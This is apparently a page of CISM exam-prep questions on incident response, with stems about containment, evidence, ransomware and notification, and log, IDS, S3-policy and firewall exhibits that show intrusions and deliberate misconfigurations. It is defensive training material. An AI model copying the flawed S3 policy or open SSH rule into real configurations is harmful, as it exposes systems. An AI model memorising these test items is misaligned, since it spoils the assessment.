After an incident is contained and eradicated, the incident response team conducts a post-incident review. Which of the following is the PRIMARY objective of this review?

Question 123hardmultiple choice
Read the full Incident Management explanation →

During a cyber incident, the organization's legal counsel advises that certain information about the breach should not be shared with external partners due to ongoing law enforcement investigation. The incident response team must balance transparency with confidentiality. Which of the following is the BEST approach?

Question 124easymulti select
Read the full Incident Management explanation →

Which TWO are key indicators of a data breach? (Choose two.)

Question 125mediummulti select
Read the full Incident Management explanation →

Which THREE are essential steps in incident containment? (Choose three.)

Question 126hardmulti select
Read the full Incident Management explanation →

Which THREE are valid sources for threat intelligence that can be used during incident response? (Choose three.)

Question 127mediummultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. Given the exhibit, which type of incident is MOST likely occurring?

Exhibit

[2025-04-09 10:23:45] ALERT: User 'jdoe' logged in from IP 198.51.100.100 (unusual location) at 10:23:45.
[2025-04-09 10:24:10] EVENT: User 'jdoe' attempted to access /admin/config with lack of privilege.
[2025-04-09 10:25:00] EVENT: User 'jdoe' accessed /finance/customers.xlsx and downloaded 500MB.
[2025-04-09 10:25:30] ALERT: Large data transfer from internal IP to external IP 203.0.113.5.
Question 128hardmultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. Based on the exhibit, what is the security implication of this S3 bucket policy?

Exhibit

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::company-reports/*",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "10.0.0.0/8"
        }
      }
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::company-reports/*"
    }
  ]
}
Question 129easymultiple choice
Read the full NAT/PAT explanation →

Refer to the exhibit. The exhibit shows network traffic from a server to a database. What does this pattern MOST likely indicate?

Exhibit

2025-04-09 10:30:00 192.168.1.10 -> 10.10.10.10:3306 (MySQL) - 10 connections
2025-04-09 10:30:05 192.168.1.10 -> 10.10.10.10:3306 - 20 connections
2025-04-09 10:30:10 192.168.1.10 -> 10.10.10.10:3306 - 50 connections
2025-04-09 10:30:15 192.168.1.10 -> 10.10.10.10:3306 - 100 connections
Question 130easymultiple choice
Read the full Incident Management explanation →

After a security incident, which step should be taken first?

Question 131easymultiple choice
Read the full Incident Management explanation →

A company's IDS alerts on a potential breach. The incident response team is called. What should they do immediately?

Question 132easymultiple choice
Read the full Incident Management explanation →

During incident investigation, which evidence preservation method is most important?

Question 133mediummultiple choice
Read the full Incident Management explanation →

A company experiences ransomware that encrypts critical servers. Backups are available but were taken 2 weeks ago. What is the best course?

Question 134mediummultiple choice
Read the full Incident Management explanation →

An organization's incident response plan includes a call tree. During an incident, the primary contact is unreachable. What should happen?

Question 135mediummultiple choice
Read the full NAT/PAT explanation →

After containing a security incident, the team conducts a root cause analysis. They find the breach originated from a compromised third-party vendor account. What is the most effective long-term mitigation?

Question 136hardmultiple choice
Read the full Incident Management explanation →

An incident response team is dealing with a persistent threat that uses fileless malware. Which containment strategy is most effective?

Question 137hardmultiple choice
Read the full Incident Management explanation →

During a data breach investigation, the team discovers that an attacker exfiltrated data via encrypted HTTPS to a server abroad. Which forensic step is most critical?

Question 138hardmultiple choice
Read the full Incident Management explanation →

An organization's IR plan is tested annually. After a test, many gaps are identified. What is the best next step?

Question 139mediummulti select
Read the full Incident Management explanation →

Which TWO actions are essential during the detection and analysis phase of incident response?

Question 140mediummulti select
Read the full Incident Management explanation →

Which TWO are common challenges in incident management?

Question 141hardmulti select
Read the full Incident Management explanation →

Which THREE are key components of an effective post-incident review?

Question 142mediummultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. An analyst sees this alert on the network. What is the most appropriate immediate action?

Exhibit

[IDS Alert] Signature: ET TROJAN Known Botnet C2 1
Source: 10.0.1.50:443 -> Destination: 203.0.113.5:8080
Payload: [encrypted]
Question 143hardmultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. What is most suspicious about this event?

Exhibit

[Windows Event Log] Event ID 4688: A new process has been created.
Creator Subject: Security ID: S-1-5-21-...  Account Name: jdoe
Process Information: New Process ID: 0x1a2b  New Process Name: C:\Users\jdoe\AppData\Local\Temp\svchost.exe
Question 144hardmultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. An organization uses these firewall rules. After a breach, the IR team finds that the attacker gained access via SSH from an external IP. Which rule is most likely misconfigured?

Exhibit

Firewall Rule (inbound): allow tcp any any 22 (SSH) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3389 (RDP) log
Firewall Rule (inbound): allow tcp any any 80 (HTTP) log
Firewall Rule (inbound): allow tcp any any 443 (HTTPS) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3306 (MySQL) log
Question 145easymultiple choice
Read the full Incident Management explanation →

A security analyst receives an alert from the SIEM indicating a high number of failed login attempts from a single external IP address targeting a public-facing web server. The analyst checks the logs and sees that the attempts are using common usernames. What is the MOST appropriate immediate response?

Question 146mediummultiple choice
Read the full Incident Management explanation →

During the eradication phase of an incident response, which action is MOST critical to ensure the threat is fully removed?

Question 147hardmultiple choice
Read the full Incident Management explanation →

A financial institution has an incident involving a suspected data breach of customer PII. The incident response team contains the breach. What should be the NEXT priority according to legal and regulatory requirements?

Question 148easymultiple choice
Read the full Incident Management explanation →

An organization experiences a DDoS attack that overwhelms their internet connection. Which containment strategy would be MOST effective?

Question 149mediummultiple choice
Read the full Incident Management explanation →

During the identification phase of incident response, which of the following is the MOST reliable indicator of a security incident?

Question 150hardmultiple choice
Read the full Incident Management explanation →

An organization has just recovered from a ransomware attack and restored systems from backups. Before returning to normal operations, what is the MOST important step?

Question 151easymultiple choice
Read the full Incident Management explanation →

Which of the following is the PRIMARY goal of incident containment?

Question 152mediummultiple choice
Read the full Incident Management explanation →

An incident response team discovers that an attacker used stolen credentials to access a database. Which step is MOST critical during the eradication phase?

Question 153hardmultiple choice
Read the full Incident Management explanation →

During a forensic investigation, an incident responder needs to collect memory from a compromised server. What is the BEST method to preserve evidence integrity?

Question 154mediummulti select
Read the full Incident Management explanation →

An incident responder is handling a phishing attack that resulted in credential theft. Which TWO actions should be taken FIRST in the containment phase?

Question 155hardmulti select
Read the full Incident Management explanation →

A security team detects lateral movement within the network using PowerShell scripts. Which TWO actions are MOST effective to contain the threat?

Question 156easymulti select
Read the full Incident Management explanation →

Which THREE of the following are key components of an incident response plan?

Question 157easymultiple choice
Read the full NAT/PAT explanation →

A healthcare organization suffers a ransomware attack that encrypts critical patient data. The incident response team activates the incident response plan. The backup administrator reports that the most recent backups are from three days ago and are stored on a disconnected tape drive. However, the organization's legal counsel advises that according to regulatory requirements, patient data must be recoverable within 24 hours. The CEO is considering paying the ransom to avoid extended downtime and regulatory penalties. As the incident manager, what should you recommend?

Question 158mediummultiple choice
Read the full Incident Management explanation →

A large e-commerce company detects a sophisticated attack that has compromised a web application server. The server contains customer payment card information. The incident response team is activated. During triage, the team discovers that the attacker has gained administrative access and installed a backdoor. The company's public relations department wants to issue a press release as soon as possible to maintain customer trust. Legal counsel advises that the breach must be reported to regulators within 72 hours. The technical team is working on containment. What is the MOST important priority for the incident manager at this point?

Question 159hardmultiple choice
Read the full Incident Management explanation →

A bank detects unusual activity on a server containing sensitive financial data. The activity appears to be from a compromised vendor account that has legitimate remote access to the server for maintenance. The incident manager must decide on containment while maintaining business operations. The vendor account has elevated privileges and is used for routine updates. Disabling the account would delay critical maintenance. What is the BEST course of action?

Question 160mediummultiple choice
Read the full Incident Management explanation →

A company's incident response team is conducting a tabletop exercise. They are discussing the steps after containment to prevent recurrence. The facilitator asks: 'What is the MOST important next step after containing an incident?' The team considers several options.

Question 161easymulti select
Read the full Incident Management explanation →

Which TWO of the following are PRIMARY goals of incident management according to industry best practices?

Question 162mediummulti select
Read the full Incident Management explanation →

Which THREE of the following are considered key components of an incident response plan?

Question 163hardmulti select
Read the full Incident Management explanation →

Which TWO of the following are appropriate actions to take during the detection phase of incident management?

Question 164easymultiple choice
Read the full Incident Management explanation →

A small marketing firm with 50 employees experiences a ransomware attack. The IT administrator quickly isolates the infected workstations by disconnecting them from the network. The company has a backup strategy that performs nightly backups to an on-premises NAS device. The administrator restores the affected systems from the most recent backup, but some files remain encrypted. The users report that the backups from the last two days show corruption as well. The firm does not have a formal incident response plan. The owner is anxious to get back to work and asks the administrator what to do next. What should the administrator do?

Question 165mediummultiple choice
Read the full Incident Management explanation →

A large enterprise with a centralized Security Information and Event Management (SIEM) system is experiencing a high volume of false positive alerts. The security team is overwhelmed and has started to ignore many alerts. During a recent incident, a critical alert indicating lateral movement by an attacker was missed because it was buried among hundreds of false positives. The incident escalated significantly before it was discovered. The CISO has asked the incident response manager to recommend improvements to prevent this from happening again. What should the manager recommend as the primary action?

Question 166hardmultiple choice
Read the full NAT/PAT explanation →

A multinational financial institution uses a third-party Managed Security Service Provider (MSSP) for 24/7 monitoring of its security infrastructure. During a targeted attack, the MSSP’s analysts detected anomalous activity on a critical server at 2:00 AM. However, due to the service level agreement (SLA) which allows up to 12 hours for notification of lower-priority incidents, the MSSP classified the incident as medium severity and did not notify the internal incident response team until 2:00 PM. By then, the attacker had exfiltrated sensitive customer data. The internal team is conducting a post-incident review. What is the PRIMARY issue that led to the delay?

Question 167easymultiple choice
Read the full Incident Management explanation →

A manufacturing company has an incident response plan that includes a communication plan. However, during a recent ransomware incident, the team realized that the external legal counsel was not listed in the plan. The incident requires consultation with legal due to potential regulatory implications. The incident response manager needs to address this gap quickly. What should the manager do?

Question 168mediummultiple choice
Read the full Incident Management explanation →

During a phishing campaign, several employees clicked a malicious link that downloaded a remote access trojan (RAT). The incident response team has isolated the infected endpoints and is analyzing network traffic. They suspect that data may have been exfiltrated but are unsure. The team needs to determine the extent of data exfiltration as quickly as possible. What action should the team take FIRST?

Question 169hardmultiple choice
Read the full Incident Management explanation →

An organization's incident response policy requires preserving evidence in its original state. During a live incident on a critical server, the incident response team needs to capture volatile data, such as running processes and network connections, which would be lost if the system were shut down. The team has a forensic workstation with various tools. What tool should the team use to capture the volatile data before taking the system offline?

Question 170easymultiple choice
Read the full NAT/PAT explanation →

After successfully containing an incident, the incident response team discovers that the attacker exploited a previously unknown vulnerability in a web application. The vulnerability is not yet patched by the vendor. The organization's management is concerned about the risk of another attack using the same vulnerability. What should the team recommend as the immediate action to reduce this risk?

Question 171mediummultiple choice
Read the full Incident Management explanation →

An organization's incident response team has completed the initial response to a ransomware incident. During the post-incident review, they identify that the detection was delayed because security logs from different systems were not correlated. The team wants to improve detection capabilities. What should the team recommend as the primary improvement?

Question 172hardmultiple choice
Read the full Incident Management explanation →

A financial institution is hit by a Distributed Denial of Service (DDoS) attack that is overwhelming their internet-facing services. The incident response team activates the plan, but the attack continues to escalate. The CEO is under pressure and asks the incident response manager whether they should pay the ransom demand (the attackers also sent an extortion note demanding payment to stop the attack). The manager must advise the CEO on the best course of action.

Question 173mediummultiple choice
Read the full Incident Management explanation →

A company's incident response team is handling a confirmed ransomware infection that has encrypted files on several servers. The IT director requests that the team immediately restore data from backups to minimize downtime. However, the team suspects that the backup repository may also be compromised because the attacker had administrative credentials. What is the BEST course of action?

Question 174easymulti select
Read the full Incident Management explanation →

Which TWO of the following are key performance indicators (KPIs) commonly used to measure the effectiveness of incident management processes?

Question 175hardmultiple choice
Read the full Incident Management explanation →

Based on the log entries, what is the most likely scenario?

Exhibit

Refer to the exhibit.
Exhibit:
```
2024-11-20T15:23:45Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:47Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:49Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:51Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:53Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
```
Question 176mediummultiple choice
Read the full NAT/PAT explanation →

Your organization is a multinational corporation with a hybrid cloud infrastructure, including on-premises data centers and AWS, Azure, and GCP environments. You have a distributed incident response team and a central SIEM that aggregates logs from all sources. You are the incident manager on duty when an alert fires indicating that a high-privilege user account (a domain admin) has been observed logging in from an IP address in a country where the company has no operations, at 3:00 AM local time. Subsequent investigation reveals that the same account also has a successful logon from the corporate headquarters at the same time, which is geographically impossible. The SIEM shows a single event for the suspicious logon, and no other indicators of compromise are present. The account has not been used for months. What is the BEST course of action?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CISM Practice Test 1 — 10 Questions→CISM Practice Test 2 — 10 Questions→CISM Practice Test 3 — 10 Questions→CISM Practice Test 4 — 10 Questions→CISM Practice Test 5 — 10 Questions→CISM Practice Exam 1 — 20 Questions→CISM Practice Exam 2 — 20 Questions→CISM Practice Exam 3 — 20 Questions→CISM Practice Exam 4 — 20 Questions→Free CISM Practice Test 1 — 30 Questions→Free CISM Practice Test 2 — 30 Questions→Free CISM Practice Test 3 — 30 Questions→CISM Practice Questions 1 — 50 Questions→CISM Practice Questions 2 — 50 Questions→CISM Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Information Security ProgramInformation Security Risk ManagementInformation Security GovernanceIncident Management

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Incident Management setsAll Incident Management questionsCISM Practice Hub